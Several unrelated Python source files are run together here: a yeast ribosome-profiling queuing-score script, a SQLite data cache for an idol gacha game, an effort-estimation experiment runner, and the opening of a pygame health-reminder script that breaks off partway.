df1[::-1] # reverts table df1.reset_index(inplace=True) # reset index return df1[columns] else: # error print("ERROR! Expext '+'/'-' but found {} for strand".format(strand)) def get_part_from_gtf(annotation, reference=None, feature="CDS"): tabixfile = pysam.TabixFile(annotation, parser=pysam.asGTF()) return [gtf for gtf in tabixfile.fetch(reference=reference) if (gtf.feature == feature)] def yeastChr(): # Ordered yeast Chr list short names from ensembl return ['I','II','III','IV','V','VI','VII','VIII','IX','X','XI','XII','XIII','XIV','XV', 'XVI','Mito'] chr_length_d = { 'I':230218, 'II':813184, 'III':316620, 'IV':1531933, 'IX':439888, 'Mito':85779, 'V':576874, 'VI':270161, 'VII':1090940, 'VIII':562643, 'X':745751, 'XI':666816, 'XII':1078177, 'XIII':924431, 'XIV':784333, 'XV':1091291, 'XVI':948066 } def df_2_ContiniousSeries(df, index, column="rpm"): """ returns pd.Series with 0 values for all positions in a range of index. Input df is condensed, i. e. positions with values < 0 not included :param df: condensed df, i. e. don't contain rows with 0 in index :param index: range of genome positions :param column: column name to extract from df - default is 'sum' :return: Series """ s1 = pd.Series(0, index=index) s2 = df[column] s3 = s1+s2 return s3.fillna(0) def reindex(s, name, index): """ Returns reindexed Series """ s.name = name df = s.reset_index() df['rel_Pos'] = index return df.set_index('rel_Pos')[name] #returns pd.Series ############################# c=c1=c2=c3=0# counting d = {} # dictionary for collecting data # input h5 hd5 = pd.HDFStore(infile_h5, "r") # metagene summary df columns = hd5[hd5.keys()[0]].columns for ref in yeastChr(): #sys.stderr.write("{} \n".format(DEBUG! 2)) sys.stderr.write("{:4} ...\n".format(ref)) df_f = hd5['For_rpm/'+ ref] df_r = hd5['Rev_rpm/'+ ref] ### df 2 continious Serise index = list(range(0, chr_length_d[ref] + 1)) s_f = df_2_ContiniousSeries(df_f, index, column=col) s_r = df_2_ContiniousSeries(df_r, index, column=col) stop_gtf_l = get_part_from_gtf(annotation, reference=ref, feature="stop_codon") # gtf part for stop for gtf in stop_gtf_l: #stop_codon = genome[ref][gtf.start:gtf.start+3] # get stop codon #stop_codon = stop_codon if gtf.strand=='+' else revcompl(stop_codon) # revcomp rev_strand #test coverage coverage_for = s_f.loc[gtf.start - Span:gtf.start + 3].sum() coverage_rev = s_r.loc[gtf.start:gtf.start + Span - 1].sum() coverage_rpm = coverage_for if gtf.strand == '+' else coverage_rev if coverage_rpm < thres_cover: #FILTER 1 c1+=1 continue s_1 = s_f.loc[gtf.start - Span:gtf.start + Span] # Forvard s_2 = s_r.loc[gtf.end - Span - 1:gtf.end + Span - 1] # Reverse # proper index & dataframe s = s_1 if gtf.strand == '+' else s_2[::-1] index = list(range(-Span, Span + 1)) s = reindex(s, name=str(col), index=index) # get regions # codon wise if bkg_region == 1: bkg = s.loc[-Span:-115].mean()*3 # 5PSeq & Series elif bkg_region == 2: bkg = (s.loc[-43:-21].mean()*3 + s.loc[-73:-51].mean()*3 + s.loc[-103:-81].mean()*3)/3 # to get mean value for codon else: sys.exit("-bkg can be 1 or 2 but is {}".format(args.bkg)) if bkg <= thres_bkg: #FILTER 2 continue # -17,-47,-77,-107 peak_stop = s.loc[-18 : -16].sum() # codon coverage at STOP peak_30 = s.loc[-48 : -46].sum() # 30 nt before peak_60 = s.loc[-78 : -76].sum() # 60 nt before peak_90 = s.loc[-108:-106].sum() # 90 nt before # ratios - ivide codon coverage by avarage codon coverage (rpm/rpm) - unitless qs_stop = peak_stop/bkg qs_30 = (peak_30/bkg) qs_60 = (peak_60/bkg) qs_90 = (peak_90/bkg) ########## # collect data c2+=1 d[gtf.gene_id] = [bkg, qs_stop, qs_30, qs_60, qs_90] print("{:8,} passed region threshold {}".format(c2,args.th1)) # pmake dataframe index = ["bkg", "qs_stop", "qs_30", "qs_60", "qs_90"] df = pd.DataFrame(d, index=index).T # queuingScore-Weigthed df['QS_weighted'] = df["qs_stop"] + df["qs_30"]*2 + df["qs_60"]*3 + df["qs_90"]*4 # queuingScore df['QS'] = df["qs_stop"] + df["qs_30"] + df["qs_60"] + df["qs_90"] if weighted == "NO": df.drop(labels="QS_weighted", axis=1, inplace=True) elif weighted == "YES": df.drop(labels="QS", axis=1, inplace=True) elif weighted == "BOTH": pass else: print("Warnings! parameter -w {} not recognised!".format(weighted)) i = 1 # minimal queing score to keep in table j = 50 # strong queing score worth to check mask1 = df['QS']>i mask2 = df['QS']>j df = df.loc[mask1,:] print("There are {} genes with 'QueuingScore (QS)' bigger than {}".format(df.shape[0], i)) print("There are {} most wavier genes {} times above bakground".format(df.loc[mask2,:].shape[0], j)) df.to_csv(outfile, sep='\t', header=True, index=True) print("Output:\n {}".format(outfile)) print("//") hd5.close() <gh_stars>10-100 import re import sqlite3 import pickle import os import subprocess import sys from time import time from datetime import datetime, timedelta from pytz import timezone, utc from functools import lru_cache, partial from collections import defaultdict, namedtuple, Counter from tornado import ioloop from csvloader import clean_value, load_keyed_db_file, load_db_file from . import en from . import apiclient from . import acquisition from . import extra_va_tables from . import update ark_data_path = partial(os.path.join, "_data", "ark") private_data_path = partial(os.path.join, "_data", "private") story_data_path = partial(os.path.join, "_data", "stories") transient_data_path = partial(os.path.join, os.getenv(os.getenv("TRANSIENT_DIR_POINTER", ""), "_data/transient")) _JST = timezone("Asia/Tokyo") def JST(date, to_utc=1): # this is here because some datetime calls were throwing on 29 Feb. # TODO in 4 years, check if this is still needed try: time = _JST.localize(datetime.strptime(date.replace("-02-29 ", "-03-01 "), "%Y-%m-%d %H:%M:%S")) except ValueError: # and this is here because the date format changed starting 10021500 time = _JST.localize(datetime.strptime(date.replace("/02/29 ", "/03/01 "), "%Y/%m/%d %H:%M:%S")) if to_utc: return time.astimezone(utc) else: return time def TODAY(): return utc.localize(datetime.utcnow()) def _real_scale_skill_value(max_, min_, lv): return (min_ + ((max_ - min_) / 9) * lv) / 100.0 def _scale_skill_value(max_, min_, lv): val = _real_scale_skill_value(max_, min_, lv) # if the decimal part is too small, just remove it if val - int(val) < 0.01: return int(val) else: return val def skill_chance(prob_def, ptype): maxv, minv = prob_def[ptype].probability_max, prob_def[ptype].probability_min return "{0}..{1}".format(_scale_skill_value(maxv, minv, 0), _scale_skill_value(maxv, minv, 9)) def skill_dur(dur_def, ttype): maxv, minv = dur_def[ttype].available_time_max, dur_def[ttype].available_time_min return "{0}..{1}".format(_scale_skill_value(maxv, minv, 0), _scale_skill_value(maxv, minv, 9)) def determine_best_stat(vo, vi, da): """Card stats are either balanced (VoViDa are around the same), or one stat will be noticeably higher. This function returns which one.""" VISUAL, DANCE, VOCAL, BALANCED = 1, 2, 3, 4 # for balanced cards, the ratio hi:lo will be close to 1 THRES = 1.2 stats = ((vo, VOCAL), (vi, VISUAL), (da, DANCE)) lo, lo_typ = min(stats) hi, hi_typ = max(stats) if hi / lo > THRES: return hi_typ else: return BALANCED + hi_typ def paginate_id_list(idl, pagesize=500): start = 0 step = pagesize while 1: page = idl[start:start + step] if not page: break yield page start += step Availability = namedtuple("Availability", ("type", "name", "start", "end")) Availability._TYPE_GACHA = 1 Availability._TYPE_EVENT = 2 gacha_rates_t = namedtuple("gacha_rates_t", ("r", "sr", "ssr")) # to be safe: define as exprs of int so the resulting floats will compare properly. # otherwise there may be a subtle difference between "8850/100" and "88.5" # and == will break. gacha_rates_t._REGULAR_RATES = gacha_rates_t(8500 / 100, 1200 / 100, 300 / 100) gacha_single_reward_t = namedtuple("gacha_single_reward_t", ("card_id", "is_limited", "sort_order", "relative_odds", "gsr_relative_odds")) potential_birthday_t = namedtuple("potential_birthday_t", ("month", "day", "chara")) TITLE_ONLY_REGEX = r"^[(.+)]" NAME_ONLY_REGEX = r"^(?:[.+])?(.+)$" AWAKENED_SYMBOL = "+" class DataCache(object): def __init__(self, version): self.version = version self.load_date = datetime.utcnow() self.hnd = sqlite3.connect(transient_data_path("{0}.mdb".format(version))) self.class_cache = {} self.prime_caches() self.reset_statistics() self.live_cache = { "gacha": {} } def reset_statistics(self): self.vc_this = 0 self.primed_this = Counter() @lru_cache(1) def gacha_ids(self): gachas = [] gacha_stub_t = namedtuple("gacha_stub_t", ("id", "name", "start_date", "end_date", "type", "subtype", "rates")) stub_query = """SELECT gacha_data.id, gacha_data.name, start_date, end_date, type, type_detail, gacha_rate.rare_ratio, gacha_rate.sr_ratio, gacha_rate.ssr_ratio FROM gacha_data LEFT JOIN gacha_rate USING (id) WHERE type = 3 AND type_detail = 1""" for id, n, ss, es, t, t2, r, sr, ssr in self.hnd.execute(stub_query): ss, es = JST(ss), JST(es) gachas.append(gacha_stub_t(id, n, ss, es, t, t2, gacha_rates_t(r / 100, sr / 100, ssr / 100))) self.primed_this["sel_gacha"] += 1 return sorted(gachas, key=lambda x: x.start_date) @lru_cache(1) def event_ids(self): events = [] event_stub_t = namedtuple("event_stub_t", ("id", "name", "start_date", "end_date")) for id, na, ss, es in self.hnd.execute("SELECT id, name, event_start, event_end FROM event_data"): ss, es = JST(ss), JST(es) events.append(event_stub_t(id, na, ss, es)) self.primed_this["sel_event"] += 1 return sorted(events, key=lambda x: x.start_date) def gachas(self, when): select = [] for stub in reversed(self.gacha_ids()): if stub.start_date <= when < stub.end_date: select.append(stub) return select def available_cards(self, gacha): has_legacy_available_data, = self.hnd.execute("SELECT count(0) FROM gacha_available WHERE gacha_id = ?", (gacha.id,)).fetchone() if has_legacy_available_data: query = "SELECT reward_id, limited_flag, (CASE WHEN recommend_order == 0 THEN 9999 ELSE recommend_order END), relative_odds, relative_sr_odds FROM gacha_available WHERE gacha_id = ?" else: # Note: gacha_available_2 only lists featured cards. query = "SELECT card_id, limited_flag, recommend_order, 0, 0 FROM gacha_available_2 WHERE gacha_id = ? ORDER BY recommend_order" cur_1 = self.hnd.execute(query, (gacha.id,)) self.primed_this["sel_ac"] += 1 return [gacha_single_reward_t(*r) for r in cur_1] def limited_availability_cards(self, gachas): select = [gacha.id for gacha in gachas] tmp = defaultdict(lambda: []) lastlen = 0 for page in paginate_id_list(select): self.primed_this["sel_la"] += 1 if lastlen != len(page): query = "SELECT gacha_id, reward_id FROM gacha_available WHERE limited_flag == 1 AND gacha_id IN ({0})".format(",".join("?" * len(select))) query_2 = "SELECT gacha_id, card_id FROM gacha_available_2 WHERE limited_flag == 1 AND gacha_id IN ({0})".format(",".join("?" * len(select))) for gid, reward in self.hnd.execute(query, page): if reward in self.fix_limited: # XXX we only support negative fixes for now continue tmp[gid].append(reward) try: q2_iterator = self.hnd.execute(query_2, page) except sqlite3.OperationalError: continue for gid, reward in q2_iterator: if reward not in self.fix_limited and reward not in tmp[gid]: tmp[gid].append(reward) return [tmp[gacha.id] for gacha in gachas] def current_limited_availability(self): return self.limited_availability(TODAY()) def events(self, when): select = [] for stub in reversed(self.event_ids()): if stub.start_date <= when < stub.end_date: select.append(stub) return select def current_events(self): return self.events(TODAY()) def load_names(self): overrides = load_keyed_db_file(private_data_path("overrides.csv")) names = load_keyed_db_file(transient_data_path("names.csv")) if not names: # then we can't get a schema names.update(overrides) return names schema = next(iter(names.values())).__class__ names_keys = set(schema._fields) overrides_keys = set(schema._fields) if not overrides_keys <= names_keys: raise Exception('names.csv schema error: all of "chara_id","kanji","kanji_spaced","kana_spaced","conventional" must be present in the header') # maps kanji -> chara id by_kanji = {v.kanji: k for k, v in names.items()} for key in overrides: if key < 0: # a negative chara id in the override entry means we should match on kanji. real_key = by_kanji.get(overrides[key].kanji) intermediate = names.get(real_key) else: real_key = key intermediate = names.get(key) if intermediate is None: continue d = intermediate._asdict() override_vals = overrides[key]._asdict() # chara_id may differ if we indexed on kanji, so remove it del override_vals["chara_id"] d.update(override_vals) names[real_key] = schema(**d) # Filter out any special-purpose char entries. valid_char_ids = set(id for id, in self.hnd.execute("SELECT chara_id FROM chara_data WHERE base_card_id != 0")) names = {k: v for k, v in names.items() if k in valid_char_ids} return names def prime_caches(self): self.names = self.load_names() self.kanji_to_name = {v.kanji: v.conventional for v in self.names.values()} self.ea_overrides = list(load_db_file(private_data_path("event_availability_overrides.csv"))) self.fix_limited = load_keyed_db_file(private_data_path("gacha_availability_overrides.csv")) self.overridden_events = set(x.event_id for x in self.ea_overrides) prob_def = self.keyed_prime_from_table("probability_type") time_def = self.keyed_prime_from_table("available_time_type") self._skills = self.keyed_prime_from_table("skill_data", chance=lambda obj: partial(skill_chance, prob_def, obj.probability_type), dur=lambda obj: partial(skill_dur, time_def, obj.available_time_type), max_chance=lambda obj: prob_def[obj.probability_type].probability_max, max_duration=lambda obj: time_def[obj.available_time_type].available_time_max) self._lead_skills = self.keyed_prime_from_table("leader_skill_data") self.rarity_dep = self.keyed_prime_from_table("card_rarity") self.chain_id = {} self.id_chain = defaultdict(lambda: []) chain_cur = self.hnd.execute("SELECT id, series_id FROM card_data WHERE album_id > 0") for p in self.prime_from_cursor("chain_id_t", chain_cur): self.chain_id[p.id] = p.series_id self.id_chain[p.series_id].append(p.id) self.char_cache = {} self.card_cache = {} def prime_from_table(self, table, **kwargs): rows = self.hnd.execute("SELECT * FROM {0}".format(table)) class_name = table + "_t" return self.prime_from_cursor(class_name, rows, **kwargs) def prime_from_cursor(self, typename, cursor, **kwargs): the_raw_type, the_type = self.class_cache.get(typename, (None, None)) keys = list(kwargs.keys()) if not the_raw_type: fields = [x[0] for x in cursor.description] raw_field_len = len(fields) the_raw_type = namedtuple("_" + typename, fields) for key in keys: fields.append(key) the_type = namedtuple(typename, fields) self.class_cache[typename] = (the_raw_type, the_type) for val_list in cursor: temp_obj = the_raw_type(*map(clean_value, val_list)) try: extvalues = tuple(kwargs[key](temp_obj) for key in keys) except Exception: raise RuntimeError( "Uncaught exception while filling stage2 data for {0}. Are you missing data?".format(temp_obj)) yield the_type(*temp_obj + extvalues) def keyed_prime_from_table(self, table, **kwargs): ret = {} for t in self.prime_from_table(table, **kwargs): ret[t[0]] = t return ret def cache_chars(self, idl): lastlen = 0 for ids in paginate_id_list(list(set(idl))): if lastlen != len(ids): query = "SELECT * FROM chara_data WHERE base_card_id != 0 AND chara_id IN ({0})".format(",".join("?" * len(ids))) lastlen = len(ids) cur = self.hnd.execute(query, ids) for p in self.prime_from_cursor("chara_data_t", cur, kanji_spaced=lambda obj: self.names.get(obj.chara_id).kanji_spaced, kana_spaced=lambda obj: self.names.get(obj.chara_id).kana_spaced, conventional=lambda obj: self.names.get(obj.chara_id).conventional, valist=lambda obj: []): self.char_cache[p.chara_id] = p self.primed_this["prm_char"] += 1 self.primed_this["prm_char_calls"] += 1 cur.close() def cache_cards(self, idl): normalized_idl = set() for id in idl: a = self.chain_id.get(id) if a: normalized_idl.add(a) idl = list(normalized_idl) query_preload_chars = "SELECT chara_id, id FROM card_data INNER JOIN chara_data USING (chara_id) WHERE base_card_id > 0 AND evolution_id > 0" self.cache_chars([row[0] for row in self.hnd.execute(query_preload_chars) if row[1] in normalized_idl]) lastlen = 0 for page in paginate_id_list(idl): if lastlen != len(page): query = "SELECT * FROM card_data WHERE series_id IN ({0})".format(",".join("?" * len(page))) cur = self.hnd.execute(query, page) selected = self.prime_from_cursor("card_data_t", cur, chara=lambda obj: self.char_cache.get(obj.chara_id), has_spread=lambda obj: obj.rarity > 4, has_sign=lambda obj: obj.rarity == 7, name_only=lambda obj: re.match(NAME_ONLY_REGEX, obj.name).group(1), title=lambda obj: re.match(TITLE_ONLY_REGEX, obj.name).group(1) if obj.title_flag else None, skill=lambda obj: self._skills.get(obj.skill_id), lead_skill=lambda obj: self._lead_skills.get(obj.leader_skill_id), rarity_dep=lambda obj: self.rarity_dep.get(obj.rarity), overall_min=lambda obj: obj.vocal_min + obj.dance_min + obj.visual_min, overall_max=lambda obj: obj.vocal_max + obj.dance_max + obj.visual_max, overall_bonus=lambda obj: obj.bonus_vocal + obj.bonus_dance + obj.bonus_visual, valist=lambda obj: [], best_stat=lambda obj: determine_best_stat(obj.vocal_max, obj.visual_max, obj.dance_max)) for p in selected: self.card_cache[p.id] = p self.primed_this["prm_card"] += 1 self.primed_this["prm_card_calls"] += 1 def card(self, id): if id not in self.card_cache: self.cache_cards([id]) return self.card_cache.get(id) def cards(self, ids): needed = [c for c in ids if c not in self.card_cache] if needed: self.cache_cards(needed) return [self.card_cache.get(c) for c in ids] def cards_belonging_to_char(self, id): return self.all_chara_id_to_cards().get(id, []) @lru_cache(1) def all_chara_id_to_cards(self): ret = defaultdict(lambda: []) idl = self.hnd.execute("SELECT card_data.chara_id, card_data.id FROM card_data " "INNER JOIN chara_data USING (chara_id) WHERE evolution_id != 0 AND base_card_id != 0 " "ORDER BY card_data.chara_id") for cid, card in idl: ret[cid].append(card) return ret def chara(self, id): if id not in self.char_cache: self.cache_chars([id]) return self.char_cache.get(id) def charas(self, ids): needed = [c for c in ids if c not in self.char_cache] if needed: self.cache_chars(needed) return [self.char_cache.get(c) for c in ids] def chain(self, id): series_id = self.chain_id.get(id) if not series_id: return None return self.id_chain[series_id] def all_chain_ids(self): return sorted(self.id_chain.keys()) def skills(self, ids): return [self._skills.get(id) for id in ids] def lead_skills(self, ids): return [self._lead_skills.get(id) for id in ids] def va_data(self, id): va_list = self.hnd.execute("SELECT id, use_type, `index`, voice_flag, discription, 0 AS n1 FROM card_comments WHERE id = ?", (id,)) self.primed_this["sel_valist"] += 1 ret = list(self.prime_from_cursor("va_data_t", va_list)) if len(ret) == 0: return [] r_va_data_t, va_data_t = self.class_cache.get("va_data_t") if ret[0].voice_flag: if id in self.char_cache: yield from extra_va_tables.char_voices(va_data_t, id) else: yield from extra_va_tables.card_voices(va_data_t, id, self.chain_id[id]) yield from ret def svx_data(self, id): return self.prime_from_cursor("fp_data_t", self.hnd.execute("SELECT pose, position_x, position_y FROM chara_face_position WHERE chara_id = ?", (id,))) def translate_name(self, kanji): if kanji[-1] == AWAKENED_SYMBOL: return self.kanji_to_name.get(kanji[:-1], kanji[:-1]) + "+" else: return self.kanji_to_name.get(kanji, kanji) @lru_cache(1) def birthdays(self): return_value = defaultdict(lambda: []) for month, day, chara_id in self.hnd.execute("SELECT birth_month, birth_day, chara_id FROM chara_data WHERE birth_month + birth_day > 0 AND base_card_id != 0"): return_value[(month, day)].append(chara_id) self.primed_this["sel_birth"] += 1 return return_value def potential_birthdays(self, date): # the date changes depending on timezone. # we can't assume everyone is in UTC, so we'll # return every chara whose birthday is the day # of, the day before, or the day after the date # (UTC) specified in `date`. # If you use this method, you should filter # the returned values based on the actual date boundaries # of the user's timezone, i.e. clientside. yesterday = date.date() - timedelta(days=1) today = date.date() tomorrow = date.date() + timedelta(days=1) pool = [] for d in [yesterday, today, tomorrow]: char_ids_for_this_day = self.birthdays()[(d.month, d.day)] pool.extend(char_ids_for_this_day) return self.charas(pool) def fetch_motif_data(self, fortype): if fortype > 6 or fortype < 1: raise ValueError("Type doesn't exist currently") query = """SELECT motif_value, skill_motif_value.type_{0:02d}_value, skill_motif_value_grand.type_{0:02d}_value FROM skill_motif_value INNER JOIN skill_motif_value_grand USING (motif_value) GROUP BY skill_motif_value.type_{0:02d}_value, skill_motif_value_grand.type_{0:02d}_value ORDER BY motif_value""".format(fortype) return [(a[0], a[1] - 100, a[2] - 100) for a in self.hnd.execute(query)] def fetch_sparkle_data(self, fortype): if fortype > 6 or fortype < 1: raise ValueError("Type doesn't exist currently") query = """SELECT life_value, skill_life_value.type_{0:02d}_value, skill_life_value_grand.type_{0:02d}_value FROM skill_life_value INNER JOIN skill_life_value_grand USING (life_value) GROUP BY skill_life_value.type_{0:02d}_value, skill_life_value_grand.type_{0:02d}_value ORDER BY life_value""".format(fortype) return [(a[0], a[1] - 100, a[2] - 100) for a in self.hnd.execute(query)] async def live_gacha_rates(self, gacha_id): cached = self.live_cache["gacha"].get(gacha_id) if cached is not None: return cached if apiclient.is_usable(): http, api_data = await apiclient.gacha_rates(gacha_id) else: return None if not api_data: return None try: rate_dict = api_data[b"data"][b"gacha_rate"][b"charge"] individual_rate_dict = {} for k in {b"r", b"sr", b"ssr"}: cl = {X[b"card_id"]: float(X[b"charge_odds"]) for X in api_data[b"data"][b"idol_list"].get(k, [])} individual_rate_dict.update(cl) self.live_cache["gacha"][gacha_id] = { "rates": gacha_rates_t(float(rate_dict[b"r"]), float(rate_dict[b"sr"]), float(rate_dict[b"ssr"])), "indiv": individual_rate_dict, "gacha": gacha_id, } finally: return self.live_cache["gacha"].get(gacha_id) def __del__(self): self.hnd.close() def display_app_ver(): return os.environ.get("VC_APP_VER", "(unset)") data = None def hand_over_to_version(res_ver): global data data = DataCache(res_ver) def init(): global data available_mdbs = sorted((x for x in os.listdir(transient_data_path()) if x.endswith(".mdb")), reverse=1) try: explicit_vers = int(sys.argv[1]) except (ValueError, IndexError): if available_mdbs: explicit_vers = available_mdbs[0].split(".")[0] else: explicit_vers = 0 if explicit_vers and os.path.exists(transient_data_path("{0}.mdb".format(explicit_vers))): print("Loading mdb:", explicit_vers) data = DataCache(explicit_vers) apiclient.ApiClient.shared().res_ver = str(explicit_vers) else: print("No mdb, let's download one") loop = ioloop.IOLoop.current() if explicit_vers: bound = lambda: update.update_to_res_ver(explicit_vers) elif apiclient.is_usable(): print("We have enough secrets to do an automatic version check") bound = lambda: update.async_version_check(lambda: None) else: print("No data installed and we can't get it automatically. Crashing.") print("Hint: Try running this again with a version number.") print(" {0} 100xxxxx".format(sys.argv[0])) sys.exit(1) loop.run_sync(bound) from __future__ import print_function, division import sys import os sys.path.append(os.path.abspath(".")) sys.dont_write_bytecode = True # from datasets.albrecht import Albrecht # from datasets.china import China # from datasets.desharnais import Desharnais # from datasets.finnish import Finnish # from datasets.isbsg10 import ISBSG10 # from datasets.kemerer import Kemerer # from datasets.kitchenhamm import Kitchenhamm # from datasets.maxwell import Maxwell # from datasets.miyazaki import Miyazaki from datasets.cleaned.albrecht import Albrecht from datasets.cleaned.china import China from datasets.cleaned.desharnais import Desharnais from datasets.cleaned.finnish import Finnish from datasets.cleaned.isbsg10 import ISBSG10 from datasets.cleaned.kemerer import Kemerer from datasets.cleaned.kitchenhamm import Kitchenhamm from datasets.cleaned.maxwell import Maxwell from datasets.cleaned.miyazaki import Miyazaki from utils.lib import * from utils.validation import * from methods.peeking import peeking2 from methods.cart import cart from methods.teak import teak from methods.knn import knn_1, knn_3 from methods.cogee import cogee from methods.atlm import atlm from optimizer.teak_optimize import teak_optimize from utils.errors import * from utils import sk from joblib import Parallel, delayed from time import time datasets = [Albrecht, Desharnais, Finnish, Kemerer, Maxwell, Miyazaki, China, ISBSG10, Kitchenhamm] error = msae def mre_calc(y_predict, y_actual): mre = [] for predict, actual in zip(y_predict, y_actual): mre.append(abs(predict - actual) / (actual)) mmre = np.median(mre) if mmre == 0: mmre = np.mean(mre) return mmre def sa_calc(y_predict, y_actual): ar = 0 for predict, actual in zip(y_predict, y_actual): ar += abs(predict - actual) mar = ar / (len(y_predict)) marr = sum(y_actual) / len(y_actual) sa_error = (1 - mar / marr) return sa_error def run(reps=1): for dataset_class in datasets: dataset = dataset_class() model_scores = {"CART": N(), "PEEKING": N(), "TEAK": N(), "KNN1": N(), "KNN3": N(), "ATLM": N(), "COGEE": N(), "O_TEAK": N() } for score in model_scores.values(): score.go = True for _ in xrange(reps): for test, rest in kfold(dataset.get_rows(), 3, shuffle=True): say(".") desired_effort = [dataset.effort(row) for row in test] all_efforts = [dataset.effort(one) for one in rest] model_scores["PEEKING"] += error(desired_effort, peeking2(dataset, test, rest), all_efforts) model_scores["CART"] += error(desired_effort, cart(dataset, test, rest), all_efforts) model_scores["TEAK"] += error(desired_effort, teak(dataset, test, rest), all_efforts) model_scores["KNN1"] += error(desired_effort, knn_1(dataset, test, rest), all_efforts) model_scores["KNN3"] += error(desired_effort, knn_3(dataset, test, rest), all_efforts) model_scores["ATLM"] += error(desired_effort, atlm(dataset, test, rest), all_efforts) model_scores["COGEE"] += error(desired_effort, cogee(dataset, test, rest), all_efforts) model_scores["O_TEAK"] += error(desired_effort, teak_optimize(dataset, test, rest), all_efforts) sk_data = [[key] + n.cache.all for key, n in model_scores.items()] print("\n### %s (%d projects, %d decisions)" % (dataset_class.__name__, len(dataset.get_rows()), len(dataset.dec_meta))) print("```") sk.rdivDemo(sk_data) print("```") print("") def run_for_dataset(dataset_class, dataset_id, reps): write_file = "results/%s_sa_mre.txt" % dataset_class.__name__ with open(write_file, "wb") as f: dataset = dataset_class() dataset_name = dataset_class.__name__ print("\n### %s (%d projects, %d decisions)" % (dataset_name, len(dataset.get_rows()), len(dataset.dec_meta))) # folds = 3 if len(dataset.get_rows()) < 40 else 10 folds = 3 for rep in range(reps): fold_id = 0 for test, rest in kfold(dataset.get_rows(), folds, shuffle=True): print("Running for %s, rep = %d, fold = %d" % (dataset_name, rep + 1, fold_id)) fold_id += 1 all_efforts = [dataset.effort(one) for one in rest] actual_efforts = [dataset.effort(row) for row in test] start = time() atlm_efforts = atlm(dataset, test, rest) atlm_end = time() cart_efforts = cart(dataset, test, rest) cart_end = time() cogee_efforts = cogee(dataset, test, rest) cogee_end = time() atlm_mre, atlm_sa = mre_calc(atlm_efforts, actual_efforts), msa(actual_efforts, atlm_efforts, all_efforts) cart_mre, cart_sa = mre_calc(cart_efforts, actual_efforts), msa(actual_efforts, cart_efforts, all_efforts) cogee_mre, cogee_sa = mre_calc(cogee_efforts, actual_efforts), msa(actual_efforts, cogee_efforts, all_efforts) f.write("%s;%d;%f;%f;%f\n" % (dataset_name, 1, atlm_mre, atlm_sa, atlm_end - start)) f.write("%s;%d;%f;%f;%f\n" % (dataset_name, 2, cart_mre, cart_sa, cart_end - start)) f.write("%s;%d;%f;%f;%f\n" % (dataset_name, 3, cogee_mre, cogee_sa, cogee_end - start)) return write_file def run_patrick(reps, num_cores, consolidated_file="results/patrick_sa_mre.txt"): local_datasets = datasets # local_datasets = [Miyazaki] dataset_files = Parallel(n_jobs=num_cores)(delayed(run_for_dataset)(dataset_class, dataset_id, reps) for dataset_id, dataset_class in enumerate(local_datasets)) with open(consolidated_file, "wb") as f: f.write("dataset;method;SA;MRE;Runtime\n") for dataset_file in dataset_files: with open(dataset_file) as df: for line in df.readlines(): if len(line) > 0: f.write("%s" % line) # os.remove(dataset_file) def sarro_cogee_dataset(dataset_class, error, folds, reps): dataset = dataset_class() print("\n### %s (%d projects, %d decisions)" % (dataset_class.__name__, len(dataset.get_rows()), len(dataset.dec_meta))) model_scores = {"CART": N(), "ATLM": N(), "COGEE": N() } for score in model_scores.values(): score.go = True for _ in range(reps): for test, rest in kfold(dataset.get_rows(), folds, shuffle=True): say(".") desired_effort = [dataset.effort(row) for row in test] all_efforts = [dataset.effort(one) for one in rest] model_scores["CART"] += error(desired_effort, cart(dataset, test, rest), all_efforts) model_scores["ATLM"] += error(desired_effort, atlm(dataset, test, rest), all_efforts) model_scores["COGEE"] += error(desired_effort, cogee(dataset, test, rest), all_efforts) sk_data = [[key] + n.cache.all for key, n in model_scores.items()] print("```") stat = sk.rdivDemo(sk_data) print("```") print("") write_file = "%s/%s.txt" % ("results/sarro", dataset_class.__name__) with open(write_file, "wb") as f: f.write("\n### %s (%d projects, %d decisions)\n" % (dataset_class.__name__, len(dataset.get_rows()), len(dataset.dec_meta))) f.write("```\n%s\n```\n\n" % stat) return write_file def sarro_cogee(num_cores, folds=3, reps=10): datasets = [China, Desharnais, Finnish, Maxwell, Miyazaki, Albrecht, Kemerer, ISBSG10, Kitchenhamm] # datasets = [Miyazaki, Finnish] mkdir("results/sarro") error = msa dataset_files = Parallel(n_jobs=num_cores)(delayed(sarro_cogee_dataset)(dataset_class, error, folds, reps) for dataset_id, dataset_class in enumerate(datasets)) consolidated_file = "results/sarro/sa.md" with open(consolidated_file, "wb") as f: for dataset_file in dataset_files: with open(dataset_file) as df: for line in df.readlines(): f.write(line) def run_patrick_v2(): reps = 20 folds = 3 contents = [] for dataset_class in datasets: dataset = dataset_class() dataset_name = dataset_class.__name__ start = time() atlm_mres, atlm_sas = [], [] for rep in range(reps): fold_id = 0 for test, rest in kfold(dataset.get_rows(), folds, shuffle=True): print("Running for %s, rep = %d, fold = %d" % (dataset_name, rep + 1, fold_id)) fold_id += 1 all_efforts = [dataset.effort(one) for one in rest] actual_efforts = [dataset.effort(row) for row in test] atlm_efforts = atlm(dataset, test, rest) atlm_mre, atlm_sa = mre_calc(atlm_efforts, actual_efforts), msa(actual_efforts, atlm_efforts, all_efforts) atlm_mres.append(atlm_mre) atlm_sas.append(atlm_sa) end = time() content = "dataset: %s\ntotal runtime: %f\n" % (dataset_name, end - start) content += "\nMRE\n" + " ".join(map(str, atlm_mres)) + "\n" content += "\nSA\n" + " ".join(map(str, atlm_sas)) + "\n" contents.append(content) with open("results/patrick_sa_mre_v2.txt", "wb") as f: f.write("\n########################################\n\n".join(contents)) def _sarro(): reps = 10 folds = 3 cores = 16 sarro_cogee(cores, folds, reps) def _main(): # reps = 20 # cores = 16 # consolidated_file = "results/patrick_sa_mre_v2.txt" # run_patrick(reps, cores, consolidated_file) run_patrick_v2() if __name__ == "__main__": _main() # _sarro() from pygame import init, mixer import pygame pygame.init() from datetime import datetime from time import time def musicloop(file , stopword): mixer.init() pygame.mixer.music.load(file) mixer.music.play(15) while True: a=input() if a==stopword: mixer.music.stop() break def detailkeeper(message): with open("My Details.txt" , "a") as f: f.write(f"You - {message} - At - {datetime.now()}\n\n") if __name__== '__main__': print("ENTER YOUR REQUIRED DURATION BELOW IN Seconds \n\n") water_duration =int(input("\nWater Duration\n")) eye_duration = int(input("\nEye Relax Duration\n")) exercise_duration = int(input("\nExercise Duration\n")) init_water = time() init_eye = time() init_exercise = time() while True: if time() - init_water > water_duration: print("\n\nWater Drinking Time Dude.\nEnter 'drank' to stop the remainder") musicloop('water.mp3' , 'drank') init_water= time() detailkeeper("Drank Water") elif time() - init_eye > eye_duration: print("\n\nEye Relaxing Time Dude.\nEnter 